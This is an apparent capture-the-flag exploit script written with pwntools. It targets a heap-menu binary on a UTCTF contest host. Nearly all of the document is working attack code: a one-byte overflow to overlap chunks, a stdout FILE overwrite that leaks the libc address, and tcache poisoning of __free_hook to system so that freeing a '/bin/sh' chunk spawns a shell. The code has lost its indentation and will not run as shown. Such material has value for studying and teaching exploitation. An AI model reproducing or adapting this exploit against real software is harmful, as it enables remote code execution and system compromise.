Rating: 1.3
```
from pwn import *
context.terminal = ['tmux','new-window']
e = ELF('./pwnable_2')
p = ''
libc = e.libc
def c(ch):
p.sendlineafter('Cancel Person\n',str(ch))
def add(idx, size, data):
c(1)
p.sendlineafter('Index: ', str(idx))
p.sendlineafter('Name: ', 'tohru')
p.sendlineafter('Length of description: ',str(size))
p.sendafter('Description: ',data)
def free(idx):
c(2)
p.sendlineafter(': ',str(idx))
def main():
global p
p = remote('binary.utctf.live', 9050)
add(0,0x10,'a')
add(1,0x420,'a')
add(2,0x38,p64(0x470)*7)
free(1)
free(0)
add(0,0x18,'A'*0x18+"\x71")
free(2)
add(2,0x428,'a')
add(2,0x20,'\x60\x87')
add(4,0x30,'a')
context.timeout=1
try:
add(5,0x38,p64(0xfbad1800)+ 3*p64(0) + '\x00')
libc.address = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x3ed8b0
except:
print "try again"
return
if libc.address == -0x3ed8b0:
print 'try again'
return
print hex(libc.address)
add(0,0x10,'a')
add(1,0x10,'a')
add(2,0x10,'a')
free(0)
add(0,0x18,'A'*0x18+"\x51")
free(1)
free(2)
add(5,0x48,'A'*0x10+p64(0)+p64(0x21)+p64(libc.symbols['__free_hook']))
add(0,0x10,'/bin/sh;')
add(1,0x10,p64(libc.symbols['system']))
free(0)
p.interactive()
for i in range(30):
main()
```
